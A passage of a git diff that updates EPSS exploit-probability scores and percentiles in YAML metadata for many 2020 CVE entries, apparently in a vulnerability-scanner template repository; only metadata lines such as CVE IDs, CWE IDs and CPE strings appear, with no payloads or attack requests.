d716a27f79..809d80a63f 100644 --- a/http/cves/2020/CVE-2020-17526.yaml +++ b/http/cves/2020/CVE-2020-17526.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-17526 cwe-id: CWE-287 epss-score: 0.24573 - epss-percentile: 0.96098 + epss-percentile: 0.961 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-17530.yaml b/http/cves/2020/CVE-2020-17530.yaml index 1d3f27333d..4370bb32ce 100644 --- a/http/cves/2020/CVE-2020-17530.yaml +++ b/http/cves/2020/CVE-2020-17530.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-17530 cwe-id: CWE-917 - epss-score: 0.96946 - epss-percentile: 0.99631 + epss-score: 0.97004 + epss-percentile: 0.99652 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-18268.yaml b/http/cves/2020/CVE-2020-18268.yaml index 77930ba0dc..5b234824b9 100644 --- a/http/cves/2020/CVE-2020-18268.yaml +++ b/http/cves/2020/CVE-2020-18268.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-18268 cwe-id: CWE-601 epss-score: 0.00138 - epss-percentile: 0.49139 + epss-percentile: 0.49157 cpe: cpe:2.3:a:zblogcn:z-blogphp:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-19282.yaml b/http/cves/2020/CVE-2020-19282.yaml index 86a34c3657..30e9817e90 100644 --- a/http/cves/2020/CVE-2020-19282.yaml +++ b/http/cves/2020/CVE-2020-19282.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-19282 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48481 + epss-percentile: 0.48494 cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-19283.yaml b/http/cves/2020/CVE-2020-19283.yaml index b485616674..fb5004d58c 100644 --- a/http/cves/2020/CVE-2020-19283.yaml +++ b/http/cves/2020/CVE-2020-19283.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-19283 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48481 + epss-percentile: 0.48494 cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-19295.yaml b/http/cves/2020/CVE-2020-19295.yaml index 739707150a..323e9571b1 100644 --- a/http/cves/2020/CVE-2020-19295.yaml +++ b/http/cves/2020/CVE-2020-19295.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-19295 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.45134 + epss-percentile: 0.4515 cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-19360.yaml b/http/cves/2020/CVE-2020-19360.yaml index 0c46f70f0a..ab4bc2ee02 100644 --- a/http/cves/2020/CVE-2020-19360.yaml +++ b/http/cves/2020/CVE-2020-19360.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-19360 cwe-id: CWE-22 epss-score: 0.0545 - epss-percentile: 0.92326 + epss-percentile: 0.92334 cpe: cpe:2.3:a:fhem:fhem:6.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-19515.yaml b/http/cves/2020/CVE-2020-19515.yaml index 78b69cbb22..871214c934 100644 --- a/http/cves/2020/CVE-2020-19515.yaml +++ b/http/cves/2020/CVE-2020-19515.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-19515 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41323 + epss-percentile: 0.41347 cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-1956.yaml b/http/cves/2020/CVE-2020-1956.yaml index ce5aea8ed6..e2490bb2a3 100644 --- a/http/cves/2020/CVE-2020-1956.yaml +++ b/http/cves/2020/CVE-2020-1956.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-1956 cwe-id: CWE-78 epss-score: 0.97389 - epss-percentile: 0.99889 + epss-percentile: 0.9989 cpe: cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-19625.yaml b/http/cves/2020/CVE-2020-19625.yaml index 944d4f2f81..1623c0720f 100644 --- a/http/cves/2020/CVE-2020-19625.yaml +++ b/http/cves/2020/CVE-2020-19625.yaml @@ -17,7 +17,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-19625 epss-score: 0.81652 - epss-percentile: 0.98006 + epss-percentile: 0.98008 cpe: cpe:2.3:a:gridx_project:gridx:1.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-20285.yaml b/http/cves/2020/CVE-2020-20285.yaml index 3bda51055d..54260fa572 100644 --- a/http/cves/2020/CVE-2020-20285.yaml +++ b/http/cves/2020/CVE-2020-20285.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-20285 cwe-id: CWE-79 epss-score: 0.0009 - epss-percentile: 0.37899 + epss-percentile: 0.37912 cpe: cpe:2.3:a:zzcms:zzcms:2019:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-20300.yaml b/http/cves/2020/CVE-2020-20300.yaml index d70e66e4e0..991242fa9f 100644 --- a/http/cves/2020/CVE-2020-20300.yaml +++ b/http/cves/2020/CVE-2020-20300.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-20300 cwe-id: CWE-89 epss-score: 0.16832 - epss-percentile: 0.95463 + epss-percentile: 0.95464 cpe: cpe:2.3:a:weiphp:weiphp:5.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-2036.yaml b/http/cves/2020/CVE-2020-2036.yaml index c0d0872943..21b42e950b 100644 --- a/http/cves/2020/CVE-2020-2036.yaml +++ b/http/cves/2020/CVE-2020-2036.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-2036 cwe-id: CWE-79 epss-score: 0.01161 - epss-percentile: 0.8334 + epss-percentile: 0.8335 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2020/CVE-2020-20982.yaml b/http/cves/2020/CVE-2020-20982.yaml index 6e604d89b0..57c72cbef0 100644 --- a/http/cves/2020/CVE-2020-20982.yaml +++ b/http/cves/2020/CVE-2020-20982.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-20982 cwe-id: CWE-79 epss-score: 0.01894 - epss-percentile: 0.87187 + epss-percentile: 0.87192 cpe: cpe:2.3:a:wdja:wdja_cms:1.5.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-20988.yaml b/http/cves/2020/CVE-2020-20988.yaml index 623f382180..b93db9ab28 100644 --- a/http/cves/2020/CVE-2020-20988.yaml +++ b/http/cves/2020/CVE-2020-20988.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-20988 cwe-id: CWE-79 epss-score: 0.0009 - epss-percentile: 0.37899 + epss-percentile: 0.37912 cpe: cpe:2.3:a:domainmod:domainmod:4.13.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-21012.yaml b/http/cves/2020/CVE-2020-21012.yaml index fc5448bb02..e4ef8055a4 100644 --- a/http/cves/2020/CVE-2020-21012.yaml +++ b/http/cves/2020/CVE-2020-21012.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-21012 cwe-id: CWE-89 epss-score: 0.0341 - epss-percentile: 0.90372 + epss-percentile: 0.90378 cpe: cpe:2.3:a:hotel_and_lodge_booking_management_system_project:hotel_and_lodge_booking_management_system:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-2103.yaml b/http/cves/2020/CVE-2020-2103.yaml index c678695ffe..d21364ab89 100644 --- a/http/cves/2020/CVE-2020-2103.yaml +++ b/http/cves/2020/CVE-2020-2103.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-2103 cwe-id: CWE-200 epss-score: 0.01531 - epss-percentile: 0.85645 + epss-percentile: 0.85651 cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-21224.yaml b/http/cves/2020/CVE-2020-21224.yaml index 720f18ca33..ac7406f7d4 100644 --- a/http/cves/2020/CVE-2020-21224.yaml +++ b/http/cves/2020/CVE-2020-21224.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-21224 cwe-id: CWE-88 epss-score: 0.03633 - epss-percentile: 0.90628 + epss-percentile: 0.90634 cpe: cpe:2.3:a:inspur:clusterengine:4.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-2140.yaml b/http/cves/2020/CVE-2020-2140.yaml index 76d63d4ac9..202b466046 100644 --- a/http/cves/2020/CVE-2020-2140.yaml +++ b/http/cves/2020/CVE-2020-2140.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-2140 cwe-id: CWE-79 epss-score: 0.00181 - epss-percentile: 0.55215 + epss-percentile: 0.55238 cpe: cpe:2.3:a:jenkins:audit_trail:*:*:*:*:*:jenkins:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-22208.yaml b/http/cves/2020/CVE-2020-22208.yaml index 38a50da35f..fbbbb87a0c 100644 --- a/http/cves/2020/CVE-2020-22208.yaml +++ b/http/cves/2020/CVE-2020-22208.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-22208 cwe-id: CWE-89 - epss-score: 0.10555 - epss-percentile: 0.94398 + epss-score: 0.13124 + epss-percentile: 0.94929 cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-22209.yaml b/http/cves/2020/CVE-2020-22209.yaml index 6f343928b3..e12eb810fe 100644 --- a/http/cves/2020/CVE-2020-22209.yaml +++ b/http/cves/2020/CVE-2020-22209.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-22209 cwe-id: CWE-89 - epss-score: 0.10555 - epss-percentile: 0.94398 + epss-score: 0.13124 + epss-percentile: 0.94929 cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-22210.yaml b/http/cves/2020/CVE-2020-22210.yaml index 3eabdf0a4d..bf8153e363 100644 --- a/http/cves/2020/CVE-2020-22210.yaml +++ b/http/cves/2020/CVE-2020-22210.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-22210 cwe-id: CWE-89 - epss-score: 0.10555 - epss-percentile: 0.94398 + epss-score: 0.13124 + epss-percentile: 0.94929 cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-22211.yaml b/http/cves/2020/CVE-2020-22211.yaml index 9a3dfee6e5..c6ba97d0e0 100644 --- a/http/cves/2020/CVE-2020-22211.yaml +++ b/http/cves/2020/CVE-2020-22211.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-22211 cwe-id: CWE-89 - epss-score: 0.10555 - epss-percentile: 0.94398 + epss-score: 0.13124 + epss-percentile: 0.94929 cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-22840.yaml b/http/cves/2020/CVE-2020-22840.yaml index cdaf764e99..ebbcd875ad 100644 --- a/http/cves/2020/CVE-2020-22840.yaml +++ b/http/cves/2020/CVE-2020-22840.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-22840 cwe-id: CWE-601 epss-score: 0.01161 - epss-percentile: 0.83339 + epss-percentile: 0.83348 cpe: cpe:2.3:a:b2evolution:b2evolution:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-23015.yaml b/http/cves/2020/CVE-2020-23015.yaml index 72a167fdc9..7b0bfd443c 100644 --- a/http/cves/2020/CVE-2020-23015.yaml +++ b/http/cves/2020/CVE-2020-23015.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-23015 cwe-id: CWE-601 epss-score: 0.00228 - epss-percentile: 0.609 + epss-percentile: 0.60928 cpe: cpe:2.3:a:opnsense:opnsense:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-23517.yaml b/http/cves/2020/CVE-2020-23517.yaml index 34e233a252..5fdbd812a3 100644 --- a/http/cves/2020/CVE-2020-23517.yaml +++ b/http/cves/2020/CVE-2020-23517.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-23517 cwe-id: CWE-79 epss-score: 0.00124 - epss-percentile: 0.4652 + epss-percentile: 0.46531 cpe: cpe:2.3:a:aryanic:high_cms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-23575.yaml b/http/cves/2020/CVE-2020-23575.yaml index 239b72de53..4205972d68 100644 --- a/http/cves/2020/CVE-2020-23575.yaml +++ b/http/cves/2020/CVE-2020-23575.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-23575 cwe-id: CWE-22 epss-score: 0.01879 - epss-percentile: 0.87128 + epss-percentile: 0.87132 cpe: cpe:2.3:o:kyocera:d-copia253mf_plus_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-23697.yaml b/http/cves/2020/CVE-2020-23697.yaml index 256581322d..ff6a7c3f7c 100644 --- a/http/cves/2020/CVE-2020-23697.yaml +++ b/http/cves/2020/CVE-2020-23697.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-23697 cwe-id: CWE-79 epss-score: 0.0009 - epss-percentile: 0.37899 + epss-percentile: 0.37912 cpe: cpe:2.3:a:monstra:monstra_cms:3.0.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-23972.yaml b/http/cves/2020/CVE-2020-23972.yaml index 6f3b2e6c61..d30f2cf284 100644 --- a/http/cves/2020/CVE-2020-23972.yaml +++ b/http/cves/2020/CVE-2020-23972.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-23972 cwe-id: CWE-434 epss-score: 0.61762 - epss-percentile: 0.97451 + epss-percentile: 0.97453 cpe: cpe:2.3:a:gmapfp:gmapfp:j3.5:*:*:*:-:joomla\!:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-24148.yaml b/http/cves/2020/CVE-2020-24148.yaml index 3d58254b8d..6729bb3925 100644 --- a/http/cves/2020/CVE-2020-24148.yaml +++ b/http/cves/2020/CVE-2020-24148.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-24148 cwe-id: CWE-918 epss-score: 0.08836 - epss-percentile: 0.93867 + epss-percentile: 0.93872 cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:2.0.1:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-24223.yaml b/http/cves/2020/CVE-2020-24223.yaml index 08e9ef8401..7c8bfaa0a0 100644 --- a/http/cves/2020/CVE-2020-24223.yaml +++ b/http/cves/2020/CVE-2020-24223.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-24223 cwe-id: CWE-79 epss-score: 0.00976 - epss-percentile: 0.81721 + epss-percentile: 0.81731 cpe: cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-24312.yaml b/http/cves/2020/CVE-2020-24312.yaml index 0269526a8e..1251d71f2c 100644 --- a/http/cves/2020/CVE-2020-24312.yaml +++ b/http/cves/2020/CVE-2020-24312.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-24312 cwe-id: CWE-552 epss-score: 0.01622 - epss-percentile: 0.86093 + epss-percentile: 0.86097 cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-24391.yaml b/http/cves/2020/CVE-2020-24391.yaml index 401a284081..68d45057da 100644 --- a/http/cves/2020/CVE-2020-24391.yaml +++ b/http/cves/2020/CVE-2020-24391.yaml @@ -17,7 +17,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-24391 epss-score: 0.47848 - epss-percentile: 0.97091 + epss-percentile: 0.97096 cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:* metadata: max-request: 3 diff --git a/http/cves/2020/CVE-2020-24550.yaml b/http/cves/2020/CVE-2020-24550.yaml index 9b49e5c1f5..8955e5379a 100644 --- a/http/cves/2020/CVE-2020-24550.yaml +++ b/http/cves/2020/CVE-2020-24550.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-24550 cwe-id: CWE-601 epss-score: 0.00157 - epss-percentile: 0.52051 + epss-percentile: 0.52073 cpe: cpe:2.3:a:episerver:find:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-24571.yaml b/http/cves/2020/CVE-2020-24571.yaml index 8cea2bd383..67d6ec4d89 100644 --- a/http/cves/2020/CVE-2020-24571.yaml +++ b/http/cves/2020/CVE-2020-24571.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-24571 cwe-id: CWE-22 epss-score: 0.02513 - epss-percentile: 0.88954 + epss-percentile: 0.8896 cpe: cpe:2.3:a:nexusdb:nexusdb:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-24579.yaml b/http/cves/2020/CVE-2020-24579.yaml index 47120d597c..26d4030b78 100644 --- a/http/cves/2020/CVE-2020-24579.yaml +++ b/http/cves/2020/CVE-2020-24579.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-24579 cwe-id: CWE-287 epss-score: 0.02322 - epss-percentile: 0.88533 + epss-percentile: 0.88537 cpe: cpe:2.3:o:dlink:dsl2888a_firmware:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-24589.yaml b/http/cves/2020/CVE-2020-24589.yaml index 13631f8e1e..c4b4500ba4 100644 --- a/http/cves/2020/CVE-2020-24589.yaml +++ b/http/cves/2020/CVE-2020-24589.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-24589 cwe-id: CWE-611 epss-score: 0.55133 - epss-percentile: 0.97268 + epss-percentile: 0.97269 cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-24902.yaml b/http/cves/2020/CVE-2020-24902.yaml index 89f969cf7e..8dfa2551c3 100644 --- a/http/cves/2020/CVE-2020-24902.yaml +++ b/http/cves/2020/CVE-2020-24902.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-24902 cwe-id: CWE-79 epss-score: 0.00191 - epss-percentile: 0.56441 + epss-percentile: 0.56465 cpe: cpe:2.3:a:quixplorer_project:quixplorer:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-24903.yaml b/http/cves/2020/CVE-2020-24903.yaml index ca3660c1fc..7dd36c84da 100644 --- a/http/cves/2020/CVE-2020-24903.yaml +++ b/http/cves/2020/CVE-2020-24903.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-24903 cwe-id: CWE-79 epss-score: 0.00262 - epss-percentile: 0.63713 + epss-percentile: 0.63747 cpe: cpe:2.3:a:cutesoft:cute_editor:6.4:*:*:*:*:asp.net:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-24912.yaml b/http/cves/2020/CVE-2020-24912.yaml index dd55a83e6b..4a5f53898f 100644 --- a/http/cves/2020/CVE-2020-24912.yaml +++ b/http/cves/2020/CVE-2020-24912.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-24912 cwe-id: CWE-79 epss-score: 0.00183 - epss-percentile: 0.5546 + epss-percentile: 0.55482 cpe: cpe:2.3:a:qcubed:qcubed:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2020/CVE-2020-25078.yaml b/http/cves/2020/CVE-2020-25078.yaml index 3c0f104b82..3b766c6a88 100644 --- a/http/cves/2020/CVE-2020-25078.yaml +++ b/http/cves/2020/CVE-2020-25078.yaml @@ -16,7 +16,7 @@ info: cvss-score: 7.5 cve-id: CVE-2020-25078 epss-score: 0.96829 - epss-percentile: 0.99574 + epss-percentile: 0.99575 cpe: cpe:2.3:o:dlink:dcs-2530l_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-25213.yaml b/http/cves/2020/CVE-2020-25213.yaml index 8e9af38552..4cad0c5285 100644 --- a/http/cves/2020/CVE-2020-25213.yaml +++ b/http/cves/2020/CVE-2020-25213.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-25213 cwe-id: CWE-434 epss-score: 0.97352 - epss-percentile: 0.99862 + epss-percentile: 0.99863 cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-25495.yaml b/http/cves/2020/CVE-2020-25495.yaml index 025932dcda..4448f7d36a 100644 --- a/http/cves/2020/CVE-2020-25495.yaml +++ b/http/cves/2020/CVE-2020-25495.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-25495 cwe-id: CWE-79 epss-score: 0.00176 - epss-percentile: 0.54603 + epss-percentile: 0.54628 cpe: cpe:2.3:a:xinuos:openserver:5.0.7:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-25540.yaml b/http/cves/2020/CVE-2020-25540.yaml index c510c19f7f..a2a037b0fb 100644 --- a/http/cves/2020/CVE-2020-25540.yaml +++ b/http/cves/2020/CVE-2020-25540.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-25540 cwe-id: CWE-22 epss-score: 0.96375 - epss-percentile: 0.99406 + epss-percentile: 0.99407 cpe: cpe:2.3:a:ctolog:thinkadmin:6.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-25780.yaml b/http/cves/2020/CVE-2020-25780.yaml index bab414f83d..a468241e4d 100644 --- a/http/cves/2020/CVE-2020-25780.yaml +++ b/http/cves/2020/CVE-2020-25780.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-25780 cwe-id: CWE-22 epss-score: 0.01865 - epss-percentile: 0.87056 + epss-percentile: 0.8706 cpe: cpe:2.3:a:commvault:commcell:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-25864.yaml b/http/cves/2020/CVE-2020-25864.yaml index 7960c71d2f..f856514761 100644 --- a/http/cves/2020/CVE-2020-25864.yaml +++ b/http/cves/2020/CVE-2020-25864.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-25864 cwe-id: CWE-79 epss-score: 0.00233 - epss-percentile: 0.61214 + epss-percentile: 0.61242 cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:-:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-26153.yaml b/http/cves/2020/CVE-2020-26153.yaml index 9defbba571..59f44a5a5e 100644 --- a/http/cves/2020/CVE-2020-26153.yaml +++ b/http/cves/2020/CVE-2020-26153.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-26153 cwe-id: CWE-79 epss-score: 0.00127 - epss-percentile: 0.47051 + epss-percentile: 0.4706 cpe: cpe:2.3:a:eventespresso:event_espresso:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-26214.yaml b/http/cves/2020/CVE-2020-26214.yaml index 9a8e1836f8..5508014634 100644 --- a/http/cves/2020/CVE-2020-26214.yaml +++ b/http/cves/2020/CVE-2020-26214.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-26214 cwe-id: CWE-287 epss-score: 0.01546 - epss-percentile: 0.8571 + epss-percentile: 0.85715 cpe: cpe:2.3:a:alerta_project:alerta:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-26248.yaml b/http/cves/2020/CVE-2020-26248.yaml index 347289e96d..bc0b16c25c 100644 --- a/http/cves/2020/CVE-2020-26248.yaml +++ b/http/cves/2020/CVE-2020-26248.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-26248 cwe-id: CWE-89 epss-score: 0.01502 - epss-percentile: 0.85485 + epss-percentile: 0.85492 cpe: cpe:2.3:a:prestashop:productcomments:*:*:*:*:*:prestashop:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-26413.yaml b/http/cves/2020/CVE-2020-26413.yaml index 9f57617edc..52cc857cf8 100644 --- a/http/cves/2020/CVE-2020-26413.yaml +++ b/http/cves/2020/CVE-2020-26413.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-26413 cwe-id: CWE-200 epss-score: 0.65771 - epss-percentile: 0.97546 + epss-percentile: 0.97548 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-26876.yaml b/http/cves/2020/CVE-2020-26876.yaml index 8d19f239d2..be98c2db86 100644 --- a/http/cves/2020/CVE-2020-26876.yaml +++ b/http/cves/2020/CVE-2020-26876.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-26876 cwe-id: CWE-306 epss-score: 0.01156 - epss-percentile: 0.83306 + epss-percentile: 0.83316 cpe: cpe:2.3:a:wpcoursesplugin:wp-courses:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-26919.yaml b/http/cves/2020/CVE-2020-26919.yaml index e16f566ca6..456882c71d 100644 --- a/http/cves/2020/CVE-2020-26919.yaml +++ b/http/cves/2020/CVE-2020-26919.yaml @@ -17,7 +17,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-26919 epss-score: 0.97336 - epss-percentile: 0.9985 + epss-percentile: 0.99851 cpe: cpe:2.3:o:netgear:jgs516pe_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-26948.yaml b/http/cves/2020/CVE-2020-26948.yaml index 65bacbd583..95742ccdfa 100644 --- a/http/cves/2020/CVE-2020-26948.yaml +++ b/http/cves/2020/CVE-2020-26948.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-26948 cwe-id: CWE-918 epss-score: 0.13986 - epss-percentile: 0.95053 + epss-percentile: 0.95057 cpe: cpe:2.3:a:emby:emby:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-27191.yaml b/http/cves/2020/CVE-2020-27191.yaml index f7c0d016ae..67d6da5d7a 100644 --- a/http/cves/2020/CVE-2020-27191.yaml +++ b/http/cves/2020/CVE-2020-27191.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-27191 cwe-id: CWE-22 epss-score: 0.00787 - epss-percentile: 0.79511 + epss-percentile: 0.79521 cpe: cpe:2.3:a:lionwiki:lionwiki:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-2733.yaml b/http/cves/2020/CVE-2020-2733.yaml index eb1903d68d..25b638383f 100644 --- a/http/cves/2020/CVE-2020-2733.yaml +++ b/http/cves/2020/CVE-2020-2733.yaml @@ -17,7 +17,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-2733 epss-score: 0.29785 - epss-percentile: 0.96393 + epss-percentile: 0.96395 cpe: cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-27361.yaml b/http/cves/2020/CVE-2020-27361.yaml index 6399d195a1..7c1234491a 100644 --- a/http/cves/2020/CVE-2020-27361.yaml +++ b/http/cves/2020/CVE-2020-27361.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2020-27361 cwe-id: CWE-668 epss-score: 0.0314 - epss-percentile: 0.90007 + epss-percentile: 0.90012 cpe: cpe:2.3:a:akkadianlabs:akkadian_provisioning_manager:4.50.02:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-27467.yaml b/http/cves/2020/CVE-2020-27467.yaml index 5d3bb78f75..8ce4a289bf 100644 --- a/http/cves/2020/CVE-2020-27467.yaml +++ b/http/cves/2020/CVE-2020-27467.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-27467 cwe-id: CWE-22 epss-score: 0.00845 - epss-percentile: 0.80273 + epss-percentile: 0.80287 cpe: cpe:2.3:a:processwire:processwire:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-27481.yaml b/http/cves/2020/CVE-2020-27481.yaml index 52ebd66308..509cdfe349 100644 --- a/http/cves/2020/CVE-2020-27481.yaml +++ b/http/cves/2020/CVE-2020-27481.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-27481 cwe-id: CWE-89 epss-score: 0.10572 - epss-percentile: 0.94402 + epss-percentile: 0.94404 cpe: 